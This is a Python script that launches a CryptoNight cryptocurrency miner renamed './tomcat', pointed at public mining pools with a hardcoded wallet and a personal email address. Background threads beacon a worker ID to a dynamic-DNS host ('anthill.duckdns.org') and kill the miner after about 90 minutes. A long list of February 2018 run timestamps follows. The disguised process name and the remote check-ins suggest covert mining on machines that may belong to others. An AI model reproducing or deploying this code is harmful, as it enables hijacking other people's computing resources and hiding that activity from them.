import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:34:06.463943
#2018-02-17 16:19:07.021168
#2018-02-17 18:07:05.219358
#2018-02-17 19:55:01.862490
#2018-02-17 21:43:07.232219
#2018-02-17 23:27:07.020575
#2018-02-18 01:17:03.590565
#2018-02-18 03:04:06.484477
#2018-02-18 04:51:05.396904
#2018-02-18 06:42:01.867373
#2018-02-18 08:31:06.343239
#2018-02-18 10:18:05.838470
#2018-02-18 12:04:03.342940
#2018-02-18 13:49:04.637161
#2018-02-18 15:41:04.389721
#2018-02-18 17:31:04.598863
#2018-02-18 19:17:06.943400
#2018-02-18 21:03:03.762305
#2018-02-18 22:49:01.872739
#2018-02-19 00:37:07.079562
#2018-02-19 02:23:05.127416
#2018-02-19 04:10:07.262439
#2018-02-19 05:54:04.708373
#2018-02-19 07:44:04.388916
#2018-02-19 09:33:06.616571
#2018-02-19 11:23:06.283263
#2018-02-19 13:10:07.627809
#2018-02-19 14:57:11.605413
#2018-02-19 16:47:09.226162
#2018-02-19 18:35:10.460488
#2018-02-19 20:22:07.716850
#2018-02-19 22:12:01.751580
#2018-02-19 23:57:06.287685
#2018-02-20 01:46:07.804604
#2018-02-20 03:36:06.141665
#2018-02-20 05:22:02.088873
#2018-02-20 07:05:07.201038
#2018-02-20 08:51:07.833885
#2018-02-20 10:35:03.781219
#2018-02-20 12:21:01.883621
#2018-02-20 14:07:08.635886
#2018-02-20 15:50:03.044366
#2018-02-20 17:37:04.254146
#2018-02-20 19:26:04.262324
#2018-02-20 21:14:05.748948
#2018-02-20 22:58:07.603928
#2018-02-21 00:43:08.325862
#2018-02-21 02:29:06.973806
#2018-02-21 04:17:06.606507
#2018-02-21 06:04:06.357034
#2018-02-21 07:51:06.081476
#2018-02-21 09:38:03.873958
#2018-02-21 11:26:06.122320
#2018-02-21 13:16:05.681788
#2018-02-21 15:02:01.461231
#2018-02-21 16:52:08.544386
#2018-02-21 18:42:06.535470
#2018-02-21 20:26:01.354246
#2018-02-21 22:16:07.659765
#2018-02-22 00:05:05.999839
#2018-02-22 01:54:05.782624
#2018-02-22 03:41:02.014460
#2018-02-22 05:27:05.449150
#2018-02-22 07:12:07.814155
#2018-02-22 08:59:03.582070
#2018-02-22 10:46:10.126890
#2018-02-22 12:34:05.393583
#2018-02-22 14:20:11.743482
#2018-02-22 16:08:08.675180
#2018-02-22 17:56:05.128948
#2018-02-22 19:44:07.989694
#2018-02-22 21:34:09.068718
#2018-02-22 23:20:08.536987
#2018-02-23 01:08:07.597381
#2018-02-23 02:55:10.030671
#2018-02-23 04:35:08.906486
#2018-02-23 06:21:01.936217
#2018-02-23 08:07:05.634118
#2018-02-23 10:23:01.675776
#2018-02-23 12:16:05.686040
#2018-02-23 14:06:04.543785
#2018-02-23 15:55:12.431891
#2018-02-23 17:40:10.834345
#2018-02-23 19:26:02.067664
#2018-02-23 21:10:07.636679
#2018-02-23 22:56:03.636843
#2018-02-24 00:44:07.611644
#2018-02-24 02:37:01.878360
#2018-02-24 04:31:05.556262
#2018-02-24 06:16:04.075131
#2018-02-24 08:04:06.765366
#2018-02-24 09:47:06.491543
#2018-02-24 11:42:04.914546
#2018-02-24 13:33:07.648498
#2018-02-24 15:21:03.561333
#2018-02-24 17:10:07.206302
#2018-02-24 19:02:04.757668
#2018-02-24 20:49:07.362884
#2018-02-24 23:06:06.269006
#2018-02-25 02:22:05.167555
#2018-02-25 05:35:08.487601
#2018-02-25 11:34:04.490616